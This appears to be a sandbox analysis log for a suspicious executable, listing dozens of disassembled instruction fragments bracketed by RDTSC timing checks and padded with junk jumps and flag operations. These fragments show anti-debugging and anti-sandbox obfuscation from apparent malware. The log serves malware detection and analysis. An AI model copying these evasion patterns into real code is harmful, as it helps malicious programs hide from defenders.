Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60985 second address: 4D609AB instructions: 0x00000000 rdtsc 0x00000002 call 00007F68C0B5CAEAh 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov edi, eax 0x0000000d jmp 00007F68C0B5CAECh 0x00000012 test edi, edi 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D609AB second address: 4D609B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D609B1 second address: 4D609C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F68C0B5CAEBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D609C0 second address: 4D60A1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F69319FF841h 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F68C0520B4Bh 0x00000015 xor al, FFFFFFEEh 0x00000018 jmp 00007F68C0520B59h 0x0000001d popfd 0x0000001e push eax 0x0000001f push edx 0x00000020 pushfd 0x00000021 jmp 00007F68C0520B4Eh 0x00000026 and cx, 4968h 0x0000002b jmp 00007F68C0520B4Bh 0x00000030 popfd 0x00000031 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60A1A second address: 4D60A93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [ebp-0Ch] 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F68C0B5CAF2h 0x00000011 jmp 00007F68C0B5CAF5h 0x00000016 popfd 0x00000017 pushfd 0x00000018 jmp 00007F68C0B5CAF0h 0x0000001d adc ch, 00000028h 0x00000020 jmp 00007F68C0B5CAEBh 0x00000025 popfd 0x00000026 popad 0x00000027 mov dword ptr [esi+04h], eax 0x0000002a pushad 0x0000002b jmp 00007F68C0B5CAF4h 0x00000030 mov edx, eax 0x00000032 popad 0x00000033 lea eax, dword ptr [ebx+78h] 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60A93 second address: 4D60A97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60A97 second address: 4D60AB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0B5CAF5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60AB0 second address: 4D60ADC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0520B51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00000001h 0x0000000b jmp 00007F68C0520B4Eh 0x00000010 nop 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60ADC second address: 4D60AF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0B5CAF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60AF9 second address: 4D60B9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0520B51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F68C0520B57h 0x00000011 sub ecx, 76F2359Eh 0x00000017 jmp 00007F68C0520B59h 0x0000001c popfd 0x0000001d mov di, cx 0x00000020 popad 0x00000021 nop 0x00000022 pushad 0x00000023 push eax 0x00000024 mov ax, di 0x00000027 pop edi 0x00000028 push eax 0x00000029 movsx edx, ax 0x0000002c pop eax 0x0000002d popad 0x0000002e lea eax, dword ptr [ebp-08h] 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007F68C0520B55h 0x00000038 sbb si, 6D36h 0x0000003d jmp 00007F68C0520B51h 0x00000042 popfd 0x00000043 call 00007F68C0520B50h 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60B9C second address: 4D60BA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60BA9 second address: 4D60BAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60BAD second address: 4D60BB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60BB1 second address: 4D60BB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60C76 second address: 4D60C7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60C7A second address: 4D60C7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60C7E second address: 4D60C84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60C84 second address: 4D60C8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60C8A second address: 4D60CC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0B5CAEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushad 0x0000000f push ecx 0x00000010 mov ax, bx 0x00000013 pop edx 0x00000014 movzx ecx, bx 0x00000017 popad 0x00000018 mov dword ptr [esi+08h], eax 0x0000001b jmp 00007F68C0B5CAF1h 0x00000020 lea eax, dword ptr [ebx+70h] 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60CC8 second address: 4D60CCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60CCC second address: 4D60CDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0B5CAEFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60CDF second address: 4D60CE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60CE5 second address: 4D60CE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60CE9 second address: 4D60CED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60CED second address: 4D60D14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000001h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F68C0B5CAF9h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60D14 second address: 4D60D1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60D1A second address: 4D60D31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F68C0B5CAF3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60D31 second address: 4D60D35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60D35 second address: 4D60D46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ecx, edi 0x0000000e push edx 0x0000000f pop esi 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60D46 second address: 4D60D9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0520B54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jmp 00007F68C0520B50h 0x00000011 lea eax, dword ptr [ebp-18h] 0x00000014 jmp 00007F68C0520B50h 0x00000019 nop 0x0000001a jmp 00007F68C0520B50h 0x0000001f push eax 0x00000020 pushad 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60E4A second address: 4D60E4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60E4E second address: 4D60E54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60E54 second address: 4D60F02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, eax 0x00000005 call 00007F68C0B5CAEEh 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ecx, esi 0x00000010 pushad 0x00000011 jmp 00007F68C0B5CAF7h 0x00000016 pushfd 0x00000017 jmp 00007F68C0B5CAF8h 0x0000001c jmp 00007F68C0B5CAF5h 0x00000021 popfd 0x00000022 popad 0x00000023 mov dword ptr [esi+0Ch], eax 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F68C0B5CAECh 0x0000002d adc esi, 5CA4F308h 0x00000033 jmp 00007F68C0B5CAEBh 0x00000038 popfd 0x00000039 push eax 0x0000003a push edx 0x0000003b pushfd 0x0000003c jmp 00007F68C0B5CAF6h 0x00000041 sbb ax, 9568h 0x00000046 jmp 00007F68C0B5CAEBh 0x0000004b popfd 0x0000004c rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60F02 second address: 4D60F15 instructions: 0x00000000 rdtsc 0x00000002 mov bx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov edx, 762C06ECh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov ebx, eax 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60F15 second address: 4D60F6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0B5CAEFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b jmp 00007F68C0B5CAEFh 0x00000010 lock cmpxchg dword ptr [edx], ecx 0x00000014 pushad 0x00000015 movzx esi, bx 0x00000018 jmp 00007F68C0B5CAF1h 0x0000001d popad 0x0000001e pop edi 0x0000001f jmp 00007F68C0B5CAEEh 0x00000024 test eax, eax 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60F6A second address: 4D60F70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60F70 second address: 4D60FCC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0B5CAF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F693203B23Ah 0x0000000f jmp 00007F68C0B5CAF0h 0x00000014 mov edx, dword ptr [ebp+08h] 0x00000017 jmp 00007F68C0B5CAF0h 0x0000001c mov eax, dword ptr [esi] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F68C0B5CAF7h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60FCC second address: 4D60FE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F68C0520B54h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60FE4 second address: 4D60FE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60FE8 second address: 4D61023 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop edx 0x0000000f pushfd 0x00000010 jmp 00007F68C0520B54h 0x00000015 jmp 00007F68C0520B55h 0x0000001a popfd 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D61023 second address: 4D610D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 01B2h 0x00000007 movsx edi, cx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esi+04h] 0x00000010 pushad 0x00000011 push esi 0x00000012 mov al, bh 0x00000014 pop ecx 0x00000015 call 00007F68C0B5CAF9h 0x0000001a pushfd 0x0000001b jmp 00007F68C0B5CAF0h 0x00000020 sbb ch, 00000028h 0x00000023 jmp 00007F68C0B5CAEBh 0x00000028 popfd 0x00000029 pop esi 0x0000002a popad 0x0000002b mov dword ptr [edx+04h], eax 0x0000002e jmp 00007F68C0B5CAEFh 0x00000033 mov eax, dword ptr [esi+08h] 0x00000036 pushad 0x00000037 jmp 00007F68C0B5CAF4h 0x0000003c pushfd 0x0000003d jmp 00007F68C0B5CAF2h 0x00000042 sbb cx, D1E8h 0x00000047 jmp 00007F68C0B5CAEBh 0x0000004c popfd 0x0000004d popad 0x0000004e mov dword ptr [edx+08h], eax 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007F68C0B5CAF0h 0x0000005a rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D610D9 second address: 4D610E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0520B4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D610E8 second address: 4D61163 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0B5CAF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+0Ch] 0x0000000c jmp 00007F68C0B5CAEEh 0x00000011 mov dword ptr [edx+0Ch], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F68C0B5CAEDh 0x0000001d adc esi, 68B2AAC6h 0x00000023 jmp 00007F68C0B5CAF1h 0x00000028 popfd 0x00000029 pushfd 0x0000002a jmp 00007F68C0B5CAF0h 0x0000002f sbb al, 00000068h 0x00000032 jmp 00007F68C0B5CAEBh 0x00000037 popfd 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D61163 second address: 4D611AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, B00Ah 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esi+10h] 0x0000000d pushad 0x0000000e mov cx, 9329h 0x00000012 pushfd 0x00000013 jmp 00007F68C0520B56h 0x00000018 jmp 00007F68C0520B55h 0x0000001d popfd 0x0000001e popad 0x0000001f mov dword ptr [edx+10h], eax 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 mov ecx, edx 0x00000027 push edx 0x00000028 pop esi 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D611AE second address: 4D611C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F68C0B5CAEEh 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D611C2 second address: 4D6122F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esi+14h] 0x0000000a jmp 00007F68C0520B57h 0x0000000f mov dword ptr [edx+14h], eax 0x00000012 jmp 00007F68C0520B56h 0x00000017 mov eax, dword ptr [esi+18h] 0x0000001a jmp 00007F68C0520B50h 0x0000001f mov dword ptr [edx+18h], eax 0x00000022 jmp 00007F68C0520B50h 0x00000027 mov eax, dword ptr [esi+1Ch] 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov bx, 2890h 0x00000031 push edx 0x00000032 pop esi 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D6122F second address: 4D61235 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D61235 second address: 4D61239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D61239 second address: 4D61282 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0B5CAECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+1Ch], eax 0x0000000e jmp 00007F68C0B5CAF0h 0x00000013 mov eax, dword ptr [esi+20h] 0x00000016 jmp 00007F68C0B5CAF0h 0x0000001b mov dword ptr [edx+20h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F68C0B5CAEAh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D61282 second address: 4D61286 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D61286 second address: 4D6128C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D6128C second address: 4D61308 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0520B4Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+24h] 0x0000000c pushad 0x0000000d mov si, 182Dh 0x00000011 pushfd 0x00000012 jmp 00007F68C0520B4Ah 0x00000017 jmp 00007F68C0520B55h 0x0000001c popfd 0x0000001d popad 0x0000001e mov dword ptr [edx+24h], eax 0x00000021 pushad 0x00000022 mov al, 06h 0x00000024 pushfd 0x00000025 jmp 00007F68C0520B59h 0x0000002a sub cx, 8096h 0x0000002f jmp 00007F68C0520B51h 0x00000034 popfd 0x00000035 popad 0x00000036 mov eax, dword ptr [esi+28h] 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D61308 second address: 4D6130C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D6130C second address: 4D61365 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F68C0520B58h 0x00000008 or si, 77E8h 0x0000000d jmp 00007F68C0520B4Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushfd 0x00000018 jmp 00007F68C0520B56h 0x0000001d adc esi, 4EC10A48h 0x00000023 jmp 00007F68C0520B4Bh 0x00000028 popfd 0x00000029 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D61365 second address: 4D613A8 instructions: 0x00000000 rdtsc 0x00000002 mov ch, 0Dh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [edx+28h], eax 0x0000000a pushad 0x0000000b call 00007F68C0B5CAF1h 0x00000010 pushfd 0x00000011 jmp 00007F68C0B5CAF0h 0x00000016 add ecx, 63232FD8h 0x0000001c jmp 00007F68C0B5CAEBh 0x00000021 popfd 0x00000022 pop eax 0x00000023 push edi 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D613A8 second address: 4D613C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov ecx, dword ptr [esi+2Ch] 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F68C0520B53h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D613C8 second address: 4D613CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D613CE second address: 4D613D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D613D4 second address: 4D61455 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0B5CAEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+2Ch], ecx 0x0000000e jmp 00007F68C0B5CAF0h 0x00000013 mov ax, word ptr [esi+30h] 0x00000017 pushad 0x00000018 call 00007F68C0B5CAEEh 0x0000001d pushfd 0x0000001e jmp 00007F68C0B5CAF2h 0x00000023 adc si, 3628h 0x00000028 jmp 00007F68C0B5CAEBh 0x0000002d popfd 0x0000002e pop ecx 0x0000002f mov dh, A2h 0x00000031 popad 0x00000032 mov word ptr [edx+30h], ax 0x00000036 jmp 00007F68C0B5CAF0h 0x0000003b mov ax, word ptr [esi+32h] 0x0000003f pushad 0x00000040 movzx esi, dx 0x00000043 push edi 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D61455 second address: 4D61465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov word ptr [edx+32h], ax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D61465 second address: 4D61481 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0B5CAF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D61481 second address: 4D614C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 movsx edi, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+34h] 0x0000000e jmp 00007F68C0520B54h 0x00000013 mov dword ptr [edx+34h], eax 0x00000016 jmp 00007F68C0520B50h 0x0000001b test ecx, 00000700h 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D614C2 second address: 4D614C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D614C6 second address: 4D614CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D614CA second address: 4D614D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D614D0 second address: 4D61524 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0520B54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F69319FED75h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov cx, bx 0x00000015 pushfd 0x00000016 jmp 00007F68C0520B59h 0x0000001b or ch, 00000026h 0x0000001e jmp 00007F68C0520B51h 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D61524 second address: 4D6152A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D6152A second address: 4D6152E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
